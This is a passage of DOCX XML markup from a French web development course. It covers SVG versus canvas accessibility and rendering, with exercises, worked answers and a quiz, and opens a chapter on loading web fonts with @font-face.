              <w:t>Icônes et logos</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SVG en ligne</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Couleur héritée, netteté</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Schéma interactif</w:t>
            </w:r>
          </w:p>
        </w:tc>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SVG</w:t>
            </w:r>
          </w:p>
        </w:tc>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Événements par forme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nuage de 50 000 points</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Canvas ou WebGL</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Coût du DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Graphique de rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>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SVG ou bibliothèque</w:t>
            </w:r>
          </w:p>
        </w:tc>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Impression et accessibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Effet décoratif</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CSS</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Aucun coût structurel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux contrôles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Vérifications rapides</w:t>
        <w:br/>
        <w:t># 1. Le SVG a-t-il viewBox, title et role ?</w:t>
        <w:br/>
        <w:t>grep -c "viewBox" figure.svg</w:t>
        <w:br/>
        <w:t>grep -c "&lt;title" figure.svg</w:t>
        <w:br/>
        <w:br/>
        <w:t># 2. Poids du SVG (nettoyer les métadonnées de l'éditeur)</w:t>
        <w:br/>
        <w:t>svgo figure.svg --output figure.min.svg</w:t>
        <w:br/>
        <w:br/>
        <w:t># 3. Le canvas a-t-il une alternative textuelle dans la page ?</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RÈGLES DE DESSIN DANS LA PAGE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Une figure informative reste accessible.</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viewBox</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur tout SVG, taille pilotée par CSS.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Pas plus de quelques dizaines d'objets SVG animés.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Canvas réservé au volume ou au temps réel.</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Animations conditionnées par </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>prefers-reduced-motion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</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SVG décrit des formes dans le DOM, canvas peint des pixels.</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viewBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rend un SVG indépendant de sa taille d'affichage.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&lt;title&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;desc&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rendent une figure compréhensible.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canvas doit toujours avoir une alternative textuelle.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facteur de densité évite un canvas flou.</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Animer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>transform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> coûte moins cher que la géométrie.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Une animation se désactive avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prefers-reduced-motion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w: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choix dépend du volume, de l'interaction et de l'accessibilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cours s'achève ici. Les annexes proposent un glossaire, des aide-mémoire et une grille d'auto-évaluation.</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42.1 — Rendre un SVG accessible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 schéma est une image décorative pour l'auteur, informative pour le lecteur.</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 xml:space="preserve">Ajoutez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>title</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Décrivez les données.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la mise à l'échelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 42.2 — Corriger un canvas flou</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Le graphique est net sur un écran, flou sur un autre.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Lisez le facteur de densité.</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Redimensionnez la surface.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Réinitialisez la transformation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 42.3 — Choisir un outil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une page doit afficher 200 points reliés et permettre de cliquer sur chacun.</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Comparez les coûts.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Évaluez l'accessibilité.</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Justifiez le choix.</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42.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&lt;svg viewBox="0 0 320 120" role="img" aria-labelledby="s1 d1"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;title id="s1"&gt;Trafic par zone&lt;/title&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;desc id="d1"&gt;Europe 70 %, Afrique 30 %, sur un total de 10 000 visites.&lt;/desc&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rect x="0" y="0" width="224" height="48" fill="#0F2E4C" /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rect x="0" y="56" width="96" height="48" fill="#E0A21B" /&gt;</w:t>
        <w:br/>
        <w:t>&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>viewBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> seul suffit à rendre le dessin adaptatif ; il ne faut pas de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fixe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La description donne les valeurs, que le dessin ne permet pas de lire précisément.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 42.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>function ajuster(canvas) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const ratio = window.devicePixelRatio || 1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const rect = canvas.getBoundingClientRect();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  canvas.width = Math.round(rect.width * ratio);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  canvas.height = Math.round(rect.height * ratio);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const ctx = canvas.getContext("2d");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ctx.setTransform(ratio, 0, 0, ratio, 0, 0);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return ctx;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Sans setTransform, les coordonnées sont multipliées deux fois</w:t>
        <w:br/>
        <w:t>// et le dessin sort du cadre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La taille interne doit être la taille CSS multipliée par le ratio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>setTransform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> remet l'échelle à 1 dans le repère utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 42.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>200 points avec clic : SVG reste raisonnable ; chaque point est un élément focusable et cliquable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Au-delà de quelques milliers d'objets, le DOM devient coûteux : canvas avec calcul de proximité au clic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dans les deux cas, un tableau de données accompagne le graphique.</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 outil conserve des éléments interactifs dans le DOM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Canvas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SVG</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CSS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WebGL</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Quel attribut rend un SVG redimensionnable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width</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viewBox</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preserve</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role</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Comment éviter un canvas flou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Augmenter la taille CSS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 xml:space="preserve">Multiplier par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>devicePixelRatio</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 xml:space="preserve">Utiliser </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>image-rendering</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Désactiver le zoom</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 faut-il pour un graphique en canvas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Rien</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Une alternative textuelle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 xml:space="preserve">Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>alt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Un titre HTML</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Quelle propriété anime sans recalcul de mise en page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width</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transform</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d</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height</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Chaque forme SVG est un élément avec ses événements.</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Il définit le repère indépendamment de la taille affichée.</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La résolution interne doit suivre la densité de l'écran.</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Le contenu du canvas n'est pas accessible en soi.</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Elle est composée sans repasser par la mise en page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>43. Polices web et typographie fine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Charger les bonnes polices, éviter les décalages de mise en page et soigner le texte à l'écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Intermédiaire · Prérequis : chapitre 42</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Choisir un format de police adapté au Web.</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Charger une police sans bloquer le rendu.</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Maîtriser les métriques de substitution.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Utiliser </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>font-variation-settings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> à bon escient.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Éviter les décalages de contenu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>43.1 Format et chargement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une police web se déclare avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>@font-face</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : un nom de famille, une source et des descripteurs. Le format </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>woff2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est compressé et universellement pris en charge ; inutile de servir plusieurs formats sauf contrainte ancienne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une déclaration complète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@font-face {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-family: "Inter";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  src: url("/polices/inter-var.woff2") format("woff2");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-weight: 100 900;          /* police variable */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-style: normal;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-display: swap;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.144 — Cinq descripteurs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8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Descripteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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304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Erreur fréquente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fichier et format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Format non déclaré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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font-weight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Graisses couvertes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Déclarer une seule graisse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>font-display</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Comportement de chargement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
